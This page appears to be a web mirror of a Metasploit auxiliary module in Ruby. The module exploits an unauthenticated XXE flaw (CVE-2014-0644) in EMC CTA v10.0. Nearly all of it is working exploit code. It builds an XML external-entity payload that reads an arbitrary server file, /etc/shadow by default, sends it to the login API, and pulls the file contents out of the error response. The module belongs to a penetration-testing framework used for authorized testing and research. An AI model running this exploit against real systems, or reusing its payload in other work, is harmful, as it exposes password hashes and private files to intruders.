Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/emc_cta_xxe.rb
19640 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',

14
        'Description' => %q{

15
          EMC CTA v10.0 is susceptible to an unauthenticated XXE attack

16
          that allows an attacker to read arbitrary files from the file system

17
          with the permissions of the root user.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [

21
          'Brandon Perry <bperry.volatile[at]gmail.com>', # metasploit module

22
        ],

23
        'References' => [

24
          ['CVE', '2014-0644'],

25
          ['EDB', '32623']

26
        ],

27
        'DisclosureDate' => '2014-03-31',

28
        'Notes' => {

29
          'Reliability' => UNKNOWN_RELIABILITY,

30
          'Stability' => UNKNOWN_STABILITY,

31
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

32
        }

33
      )

34
    )

35


36
    register_options(

37
      [

38
        Opt::RPORT(443),

39
        OptBool.new('SSL', [true, 'Use SSL', true]),

40
        OptString.new('TARGETURI', [ true, "Base directory path", '/']),

41
        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),

42
      ]

43
    )

44
  end

45


46
  def run

47
    doctype = Rex::Text.rand_text_alpha(6)

48
    element = Rex::Text.rand_text_alpha(6)

49
    entity = Rex::Text.rand_text_alpha(6)

50


51
    pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>

52
<!DOCTYPE #{doctype} [

53
<!ELEMENT #{element} ANY >

54
<!ENTITY #{entity} SYSTEM "file://#{datastore['FILEPATH']}" >]>

55
<Request>

56
<Username>root</Username>

57
<Password>&#{entity};</Password>

58
</Request>

59
    }

60


61
    res = send_request_cgi({

62
      'uri' => normalize_uri(target_uri.path, 'api', 'login'),

63
      'method' => 'POST',

64
      'data' => pay

65
    })

66


67
    if !res or !res.body

68
      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")

69
    end

70


71
    file = /For input string: "(.*)"/m.match(res.body)

72


73
    if !file or file.length < 2

74
      fail_with(Failure::UnexpectedReply, "File was unretrievable. Was it a binary file?")

75
    end

76


77
    file = file[1]

78


79
    path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])

80


81
    print_good("File saved to: " + path)

82
  end

83
end

84


85